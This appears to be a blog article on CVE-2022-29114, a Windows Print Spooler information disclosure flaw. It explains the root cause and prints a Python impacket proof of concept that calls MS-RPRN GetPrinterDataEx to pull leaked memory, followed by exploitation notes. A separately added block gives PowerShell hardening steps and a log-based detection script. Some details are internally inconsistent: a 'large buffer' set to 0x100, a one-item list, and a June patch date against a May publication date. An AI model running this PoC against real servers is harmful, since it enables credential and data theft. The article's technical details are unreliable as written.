---
The past few years have put the Windows Print Spooler service under a harsh spotlight. From the notorious "PrintNightmare" bugs to dozens of lesser-known holes, attackers and security researchers alike have drilled down into its inner code. One of the more recent vulnerabilities, CVE-2022-29114, is less about remote code execution and more about leaking sensitive information—a classic Info Disclosure bug.
In this article, I’ll break down what CVE-2022-29114 is and how it works, then walk through the proof-of-concept (PoC) details and the defensive steps, keeping things simple and direct.
> *Note: CVE-2022-29114 is NOT the same as CVE-2022-29140. Both are Print Spooler bugs, but each has a unique cause and impact.*
What Is CVE-2022-29114?
CVE-2022-29114 is an information disclosure vulnerability in the Windows Print Spooler service.
In plain terms:
A regular, non-admin user (or sometimes even a remote attacker, if properly set up) can trick the Print Spooler into handing over pieces of memory that might contain sensitive data — like user credentials, cached print jobs, or other process details.
Impact: May lead to sensitive information leakage
Microsoft’s official advisory:
- CVE-2022-29114 | Windows Print Spooler Information Disclosure Vulnerability (Microsoft)
The Root Cause
Windows Print Spooler exposes several APIs for interacting with printers and jobs, such as GetPrinterData and GetJob. Some of these functions improperly validate input values or fail to sanitize output buffers. If an attacker requests more data than needed or supplies abnormal parameter values, the Print Spooler can return memory from outside the intended buffer.
This memory can contain:
- Registry data
Though attackers can’t directly control what they get, enough repeated requests could yield juicy information.
PoC: Extracting Leaked Memory
The original proof-of-concept was based on abusing the RpcGetPrinterData API. This function is accessible by normal domain users (and sometimes anonymous users on misconfigured servers).
Here’s a simplified (and cleaned-up) PoC in Python using the popular impacket library to connect via SMB and poke the spooler using MS-RPRN remote procedure calls.
Python PoC Snippet
```python
from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5.dtypes import NULL
from impacket.smbconnection import SMBConnection

def leak_spooler(server_ip, username, password, domain='.', printer=None):
    # Build the default printer path here: a default argument cannot reference server_ip
    if printer is None:
        printer = f'\\\\{server_ip}\\Printer'

    # Authenticate over SMB and reach the spooler's named pipe
    smb = SMBConnection(server_ip, server_ip)
    smb.login(username, password, domain)
    rpc_transport = rprn.DCERPCTransportFactory(f'ncacn_np:{server_ip}[\\pipe\\spoolss]')
    rpc_transport.set_smb_connection(smb)
    dce = rpc_transport.get_dce_rpc()
    dce.connect()
    dce.bind(rprn.MSRPC_UUID_RPRN)
    handle = rprn.hOpenPrinter(dce, printer)

    # Ask for a large buffer to create an over-read
    attribute = 'ConfigurationData'
    try:
        resp = rprn.hGetPrinterDataEx(dce, handle['pHandle'], attribute, maxBytesReturned=0x100)
        leaked_data = resp['pData']  # May contain out-of-bounds memory
        print(f'[+] Leaked data: {leaked_data}')
    except Exception as e:
        print(f'[-] Failed to get data: {e}')

    # Clean up the printer handle and the session
    rprn.hClosePrinter(dce, handle['pHandle'])
    dce.disconnect()
    smb.logoff()

if __name__ == "__main__":
    leak_spooler('192.168.1.100', 'user', 'pass')
```
*Note: The field ConfigurationData is used as an example - in practice, you might need to try different attribute values or lengths.*
Exploitation Details
- Requirements: Valid domain credentials (unless the server allows anonymous access to the spooler)
- Targets: Any unpatched Windows device running the Print Spooler service
- Attack: Repeatedly call APIs with oversized or abnormal parameter combinations to read uninitialized memory
- Result: Contents of the print spooler’s process memory are returned to the attacker
This is how an attacker might escalate a network foothold, search for sensitive corporate info, or gather credentials for further attacks.
Real-World Risks
While it isn’t a direct code exec flaw, even information disclosure can be a disaster — credentials, tokens, and document contents make for ideal lateral movement fuel.
- Microsoft pushed patches in June 2022’s Patch Tuesday
- Supported Windows versions were all updated (See Security Update Guide)
- No known workarounds (other than disabling Print Spooler)
To secure yourself:
- If you don’t need print services on a server, disable the Print Spooler:

```powershell
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
```
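On servers where the spooler has to stay enabled, remote opens of its named pipe can be watched for. The sketch below is an added example, not code from the original article: it assumes Security event 5145 (Detailed File Share auditing) has been exported as dictionaries using that event's field names, and flags sources that open `spoolss` over `IPC$` in bursts. The threshold, window and sample records are constructed assumptions, and 5145 records pipe opens, not the individual RPC calls made afterwards.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def _ev(ts, ip, user, target="spoolss"):
    """Build one constructed record using event 5145 EventData field names."""
    return {"EventID": 5145, "TimeCreated": ts, "IpAddress": ip,
            "SubjectUserName": user, "ShareName": r"\\*\IPC$",
            "RelativeTargetName": target}

# Constructed sample data (not real logs).
SAMPLE_EVENTS = (
    # One workstation account opening the spooler pipe 8 times in 35 seconds
    [_ev(f"2022-05-11T09:00:{s:02d}", "10.0.0.23", "jdoe") for s in range(0, 40, 5)]
    # A print client that connects occasionally
    + [_ev("2022-05-11T09:02:00", "10.0.0.50", "printsvc"),
       _ev("2022-05-11T09:30:00", "10.0.0.50", "printsvc")]
    # Busy access to a different pipe, which must be ignored
    + [_ev(f"2022-05-11T09:05:{s:02d}", "10.0.0.77", "asmith", "srvsvc") for s in range(10)]
)

def is_spoolss_open(ev):
    """True for a 5145 record describing an open of the spoolss pipe over IPC$."""
    return (ev.get("EventID") == 5145
            and ev.get("ShareName", "").upper().endswith("IPC$")
            and ev.get("RelativeTargetName", "").lower() == "spoolss")

def find_spoolss_bursts(events, threshold=5, window=timedelta(minutes=1), allow=frozenset()):
    """Return {(ip, user): peak} for sources with >= threshold opens inside one window.

    `allow` holds source IPs (for example known print clients) to skip.
    """
    hits = [(datetime.fromisoformat(e["TimeCreated"]), e) for e in events if is_spoolss_open(e)]
    recent = defaultdict(deque)   # per-source timestamps still inside the window
    flagged = {}
    for ts, ev in sorted(hits, key=lambda pair: pair[0]):
        key = (ev["IpAddress"], ev["SubjectUserName"].lower())
        if key[0] in allow:
            continue
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop opens that fell out of the sliding window
            q.popleft()
        if len(q) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(q))
    return flagged

if __name__ == "__main__":
    for (ip, user), peak in find_spoolss_bursts(SAMPLE_EVENTS).items():
        print(f"spoolss burst: {user} from {ip}, {peak} opens within one minute")
```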
Further References and Tools
- Microsoft CVE-2022-29114
- MS-RPRN Protocol Documentation (Microsoft)
- Research blog: "Yet Another Print Spooler Vuln"
Conclusion
CVE-2022-29114 is a reminder that even after the wildfires of “PrintNightmare”, the Print Spooler remains a risky Windows service worthy of your attention. Even “just” an information disclosure bug can give attackers the leverage they need.
Patch early, monitor for strange spooler use, and kill unneeded services.
Stay safe!
Timeline
Published on: 05/10/2022 21:15:00 UTC
Last modified on: 05/23/2022 17:29:00 UTC